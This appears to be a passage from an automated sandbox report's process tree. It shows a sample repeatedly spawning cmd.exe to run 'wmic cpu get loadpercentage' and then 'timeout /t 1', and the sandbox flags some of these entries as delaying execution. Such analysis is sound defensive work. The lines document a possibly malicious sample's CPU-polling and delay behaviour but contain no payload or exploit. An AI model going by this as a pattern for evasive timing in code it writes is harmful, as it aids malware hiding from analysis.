  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4076
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2764
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1128
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4276
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1096
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4256
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3244
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4072
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4576
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2868
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4112
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1288
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4920
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4176
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3996
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:400
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1096
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1088
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2816
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4640
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2124
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4324
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4708
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1288
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4128
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5088
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3256
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4704
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3428
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2296
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:304
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4204
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:816
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1208
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1368
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:96
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1896
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4228
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4132
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4864
